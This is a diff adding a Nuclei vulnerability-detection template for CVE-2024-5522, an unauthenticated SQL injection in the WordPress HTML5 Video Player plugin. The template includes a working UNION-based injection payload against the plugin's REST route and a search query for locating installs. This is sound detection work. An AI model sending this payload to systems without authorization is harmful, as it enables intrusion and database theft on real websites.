projectdiscovery · DhiyaneshGeek · Jul 1, 2024 · Jun 26, 2024 · Jul 1, 2024
diff --git a/http/cves/2024/CVE-2024-5522.yaml b/http/cves/2024/CVE-2024-5522.yaml
@@ -0,0 +1,42 @@
+id: CVE-2024-5522
+
+info:
+ name: WordPress HTML5 Video Player < 2.5.27 - SQL Injection
+ author: JohnDoeAnonITA
+ severity: critical
+ description: |
+ The HTML5 Video Player WordPress plugin before 2.5.27 does not sanitize and escape a parameter from a REST route before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks
+ remediation: Fixed in 2.5.27
+ reference:
+ - https://wpscan.com/vulnerability/bc76ef95-a2a9-4185-8ed9-1059097a506a/
+ - https://nvd.nist.gov/vuln/detail/CVE-2024-5522
+ classification:
+ cvss-score: 9.8
+ cwe-id: CWE-89
+ cve-id: CVE-2024-5522
+ epss-score: 0.04
+ epss-percentile: 9
+ metadata:
+ verified: true
+ max-request: 1
+ publicwww-query: "/wp-content/plugins/html5-video-player"
+ tags: wpscan,cve,cve2024,wordpress,wp-plugin,wp,sqli,html5-video-player
+
+variables:
+ num: "999999999"
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-json/h5vp/v1/video/0?id='+union all select concat(0x64617461626173653a,1,0x7c76657273696f6e3a,2,0x7c757365723a,md5({{num}})),2,3,4,5,6,7,8-- -"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '{{md5(num)}}'
+
+ - type: status
+ status:
+ - 200